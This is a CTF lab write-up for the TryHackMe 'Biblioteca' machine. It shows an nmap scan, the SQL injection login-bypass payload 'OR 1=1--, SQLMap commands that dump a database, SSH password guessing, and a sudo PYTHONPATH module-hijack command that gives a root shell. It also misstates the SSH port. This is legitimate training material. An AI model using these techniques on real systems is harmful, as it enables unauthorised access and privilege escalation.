TryHackMe : Biblioteca

Biblioteca is an intentionally vulnerable web application introduced by TryHackMe.

Let’s start pwning the machine. Connect the VPN provided by TryHackMe and join the room.

Lets start with information gathering. For that we’ve to do some port scanning in the IP. To do that I use Nmap tool and the command I used is

nmap -v -sC -sV -A -O -p- -T5 10.10.114.126

The available open ports are 80 (SSH) and 80 (HTTP). So lets visit the IP address in a web browser.

Found a login page and a register page. Did some directory listing, but no luck.

Then tried SQLi on the login page and it was successful. The payload which I used in both username and password field is

‘OR 1=1--

SQLi successfully executed and the web server redirected to home page.

Then I attempted to collect the databases using SQLMap tool after saving the login request which I intercepted in BurpSuite. The SQLMap command which I used is

sqlmap -r Login.txt --level=1 --risk=1 --dbs

The SQLMap found an SQLi vulnerability and the backend DBMS is MySQL.

Found a database named website. So let’s dig up more on the website database and tables on it. For that I used the SQLMap command

sqlmap -r Login.txt --level=1 --risk=1 --dbms=MySQL --dbs -D website --dump

The output of the above mentioned command is

Next step is to use the username and the password to get a SSH session. After SSH-ing into the machine, I went through a lot of essential directories. But nothing useful was found. That’s when I noticed another user named “hazel”.

But there’s no info about the user in database which acquired from SQLMap. So I gave a dictionary attack shot on the SSH for the user. Still nothing found. I redirected to the user “hazel” directory. But all files are not accessible. Then I attempted to use the same username as the password. Fortunately, it worked out.

I read the contents inside “user.txt”. The next target is to fetch the root flag. I also read the hasher.py file. Seems like the python file imported the hashlib python module. Then I ran the below command to find the potential priv-esc vectors.

sudo -l

Let’s change the directory to /tmp and create a fake hashlib python module file with the below mentioned code.

Save the above mentioned python file and execute the below mentioned command to gain root access.

sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py

The above mentioned command will set the python environment as tmp folder and also executes the hasher.py file.

Once the above mentioned command is executed, it’ll get us the root shell. Finally we are done with priv-esc. Now read the root flag and submit it.